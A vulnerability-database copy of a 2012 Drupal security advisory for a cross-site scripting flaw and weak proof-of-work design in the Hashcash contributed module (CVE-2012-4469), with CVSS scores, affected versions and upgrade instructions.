Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
drupalDrupal Security TeamDRUPAL-SA-CONTRIB-2012-105
HistoryJun 27, 2012 - 12:00 a.m.

SA-CONTRIB-2012-105 - Hashcash - Cross Site Scripting (XSS)

2012-06-2700:00:00
Drupal Security Team
www.drupal.org
8

CVSS2

2.6

Attack Vector

NETWORK

Attack Complexity

HIGH

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:H/Au:N/C:N/I:P/A:N

EPSS

0.002

Percentile

60.2%

JSON

The Hashcash project is an implementation of a Proof Of Work (POW) or Puzzle scheme where users of a service have to do computational work to have their request granted. In the case of the Drupal Hashcash project, the service is ‘form submission’ and the Proof Of Work is a token that causes a partial hash collision when concatenated with a given string. This is intended to stop spam submissions to a site.

Cross Site Scripting

When an invalid token is received and the setting “Log failed hashcash” is enabled, the invalid token is written to watchdog with incorrect placeholders.

This enables an attacker to insert arbitrary scripts into certain pages displayed to administrators via the core module Database logging.

Mitigation: The setting “Log failed hashcash” is disabled by default.

Insufficient proof of work

The Hashcash project also fails as a proper proof of work scheme:

  • 1 in 256 random answers will be accepted as the correct answer.
  • The discrepancy in resources between a legitimate user using the Javascript hash implementation and an optimal attacker using a GPGPU implementation makes the cost of calculating a Hashcash token negligible for the attacker.

The protection against spambots offered by the Drupal Hashcash project hinges on the lack of interest on behalf of an attacker.

CVE: CVE-2012-4469

Versions affected

  • Hashcash 6.x-2.x versions prior to 6.x-2.6
  • Hashcash 7.x-2.x versions prior to 7.x-2.2

Drupal core is not affected. If you do not use the contributed Hashcash module, there is nothing you need to do.

Solution

To solve the cross site scripting issue, install the latest version:

  • If you use the Hashcash module for Drupal 6.x, upgrade to Hashcash 6.x-2.6
  • If you use the Hashcash module for Drupal 7.x, upgrade to Hashcash 7.x-2.2

There is no solution for the insufficient proof of work. You need to consider the consequences of this for your sites.

Also see the Hashcash project page.

Reported by

Fixed by

Related

cvelist 1
cve 1
nvd 1
prion 1
cvelist
cvelist
CVE-2012-4469
2012-11-30 22:00:00
cve
cve
CVE-2012-4469
2012-11-30 22:55:00
nvd
nvd
CVE-2012-4469
2012-11-30 22:55:00
prion
prion
Cross site scripting
2012-11-30 22:55:00

CVSS2

2.6

Attack Vector

NETWORK

Attack Complexity

HIGH

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:H/Au:N/C:N/I:P/A:N

EPSS

0.002

Percentile

60.2%

JSON
Related for DRUPAL-SA-CONTRIB-2012-105
cvelist1cve1nvd1prion1